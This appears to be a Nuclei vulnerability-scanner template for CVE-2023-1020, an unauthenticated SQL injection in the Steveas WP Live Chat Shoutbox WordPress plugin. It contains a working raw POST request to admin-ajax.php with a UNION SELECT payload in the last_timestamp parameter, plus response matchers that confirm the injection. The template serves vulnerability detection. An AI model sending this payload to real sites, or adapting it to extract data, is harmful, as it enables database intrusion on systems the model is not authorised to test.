55 lines
1.8 KiB
YAML
55 lines
1.8 KiB
YAML
id: CVE-2023-1020
|
|
|
|
info:
|
|
name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff
|
|
- https://wordpress.org/plugins/wp-shoutbox-live-chat/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-1020
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-1020
|
|
cwe-id: CWE-89
|
|
epss-score: 0.06484
|
|
cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:*
|
|
epss-percentile: 0.92801
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
framework: wordpress
|
|
vendor: wp_live_chat_shoutbox_project
|
|
product: wp_live_chat_shoutbox
|
|
tags: wpscan,cve,cve2023,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "c8c605999f3d8352d7bb792cf3fdb25b"
|
|
- "no_participation"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|